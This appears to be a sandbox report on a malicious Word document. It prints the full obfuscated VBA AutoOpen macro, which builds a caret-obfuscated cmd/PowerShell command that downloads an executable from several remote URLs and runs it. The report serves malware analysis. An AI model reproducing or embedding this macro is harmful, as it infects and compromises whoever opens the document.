MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is designed to execute a command that appears to download and run a second-stage payload. The ClamAV detection name 'Doc.Downloader.Emooodldr-6691368-0' strongly suggests the Emooodldr family and its downloader capabilities.
Heuristics 6
-
ClamAV: Doc.Downloader.Emooodldr-6691368-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emooodldr-6691368-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4013 bytes |
SHA-256: f056939f2661d41f591ac72b2a092ee5b1af2498dbde0992eb99c988db4955c6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "FuhHWuXwnnsiE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const OvbUp = 0
Dim vULYWT(2)
vULYWT(0) = MidB(ZmXqq, 830, 409)
vULYWT(1) = MidB(ZmXqq, 830, 409)
Dim vAFRhY(3)
vAFRhY(0) = Left(AIchhNDv, 295)
vAFRhY(1) = Mid(VzsifP, 668, 900)
vAFRhY(2) = Right(wbVVT, 509)
Dim loMbj(4)
loMbj(0) = Left(AIchhNDv, 295)
loMbj(1) = Right(wbVVT, 509)
loMbj(2) = Left(AIchhNDv, 295)
loMbj(3) = Mid(VzsifP, 668, 900)
Dim vDAppa(3)
vDAppa(0) = MidB(ZmXqq, 830, 409)
vDAppa(1) = MidB(ZmXqq, 830, 409)
vDAppa(2) = MidB(ZmXqq, 830, 409)
Dim nzmik(4)
nzmik(0) = Right(wbVVT, 509)
nzmik(1) = Left(AIchhNDv, 295)
nzmik(2) = Left(AIchhNDv, 295)
nzmik(3) = Mid(VzsifP, 668, 900)
Shell@ SChjYYbYj + UsmjtjbBv + WiJEzKFVdCzF, CInt(OvbUp)
Dim CNfMJ(2)
CNfMJ(0) = Right(wbVVT, 509)
CNfMJ(1) = MidB(ZmXqq, 830, 409)
Dim oohuOK(5)
oohuOK(0) = Mid(VzsifP, 668, 900)
oohuOK(1) = Right(wbVVT, 509)
oohuOK(2) = Left(AIchhNDv, 295)
oohuOK(3) = Mid(VzsifP, 668, 900)
oohuOK(4) = Right(wbVVT, 509)
End Sub
Attribute VB_Name = "jWbuWcuduoXih"
Function SChjYYbYj()
Dim RjzwM(2)
RjzwM(0) = Right(wbVVT, 509)
RjzwM(1) = MidB(ZmXqq, 830, 409)
AjzsdYN = Format(Chr(17 + 6 + 14 + 16 + 46)) + "md /V^:ON/" + Format(Chr(11 + 4 + 9 + 11 + 32)) + Format(Chr(5 + 1 + 4 + 5 + 19)) + "^s^et ^6^" + "5t=^ " + "^ ^ ^ ^ ^ ^ ^ ^ ^ ^ }^}^" + "{h" + Format(Chr(17 + 6 + 14 + 16 + 46)) + "ta" + Format(Chr(17 + 6 + 14 + 16 + 46)) + "^};^k^aer^b;r" + "R^L$ metI-e^k^ovn^I;)rRL$ ^,^" + "u^Yj$(^e^l^i^F^d^aol" + "n^w^oD^.F^iN$^{^yrt{)FR^s^$ ni"
Dim oWfoIv(2)
oWfoIv(0) = Mid(VzsifP, 668, 900)
oWfoIv(1) = Left(AIchhNDv, 295)
Dim ZqwXN(2)
ZqwXN(0) = Mid(VzsifP, 668, 900)
ZqwXN(1) = Mid(VzsifP, 668, 900)
Dim HljZNu(3)
HljZNu(0) = Right(wbVVT, 509)
HljZNu(1) = Mid(VzsifP, 668, 900)
HljZNu(2) = Left(AIchhNDv, 295)
Dim RLCMY(4)
RLCMY(0) = MidB(ZmXqq, 830, 409)
RLCMY(1) = MidB(ZmXqq, 830, 409)
RLCMY(2) = MidB(ZmXqq, 830, 409)
RLCMY(3) = Left(AIchhNDv, 295)
fEFRmKQf = " uYj$(^h" + Format(Chr(17 + 6 + 14 + 16 + 46)) + "^aer^" + "o^f^;^'^e^xe^.'^+^" + "F^ln$+^'^\'+" + Format(Chr(17 + 6 + 14 + 16 + 46)) + "il^b^u^p:v" + "ne^$^=rRL^$;'9^0^5'^ " + "^=^ Fln$^;)'^@'(t" + "^il^pS" + "^.^'a^PN^B^S/rb^.mo" + Format(Chr(17 + 6 + 14 + 16 + 46)) + "."
Dim UHDXo(2)
UHDXo(0) = Mid(VzsifP, 668, 900)
UHDXo(1) = MidB(ZmXqq, 830, 409)
idAPNULiFm = "a^dna^ga^por^po" + Format(Chr(17 + 6 + 14 + 16 + 46)) + "^e//^:" + "pt^t^h^@^sK6^h^h^m^7^U/^s^u^." + "^sn^o^i^tu^l^o^s^i^d^e//" + ":pt^th^@XI^H^f59^Hm/es^.^o^" + "d^i" + Format(Chr(17 + 6 + 14 + 16 + 46)) + "ul^e^.w^w^w//:^pt^th"
Dim DbUsc(5)
DbUsc(0) = Right(wbVVT, 509)
DbUsc(1) = Mid(VzsifP, 668, 900)
DbUsc(2) = Right(wbVVT, 509)
DbUsc(3) = Left(AIchhNDv, 295)
DbUsc(4) = MidB(ZmXqq, 830, 409)
Dim ruHCU(4)
ruHCU(0) = Left(AIchhNDv, 295)
ruHCU(1) = Left(AIchhNDv, 295)
ruHCU(2) = MidB(ZmXqq, 830, 409)
ruHCU(3) = Left(AIchhNDv, 295)
Dim tkwJf(2)
tkwJf(0) = Right(wbVVT, 509)
tkwJf(1) = MidB(ZmXqq, 830, 409)
iJpJQ = "^@S8/vv" + "vww/mo" + Format(Chr(17 + 6 + 14 + 16 + 46)) + "^.^ajn^e^f//^:p^t^" + "th^@g/^t^en.^k^unh//^:pt" + "^t^h'^=^FR^s$;^t" + "n^eil" + Format(Chr(11 + 4 + 9 + 11 + 32)) + "^be^W^.^teN^ t" + Format(Chr(17 + 6 + 14 + 16 + 46)) + "^e^jb" + "o^-w^en=F^iN$ ^l^" + "le^hsre^wo^p&&^f^or /" + "^L %^t ^in (35^0;^-^1;^0)d" + "^o ^s^et ^2^p6K=!^2^p6K!!^" + "6^5t:~" + "%^t,1!&&i^f %^t ^ls^s ^1 " + Format(Chr(17 + 6 + 14 + 16 + 46)) + "^a" + "^l^l %^2^p6K:^~^-3^51" + "%" + Format(Chr(5 + 1 + 4 + 5 + 19))
SChjYYbYj = AjzsdYN + fEFRmKQf + idAPNULiFm + iJpJQ
Dim QzBjF(5)
QzBjF(0) = Left(AIchhNDv, 295)
QzBjF(1) = Left(AIchhNDv, 295)
QzBjF(2) = Left(AIchhNDv, 295)
QzBjF(3) = Left(AIchhNDv, 295)
QzBjF(4) = Mid(VzsifP, 668, 900)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.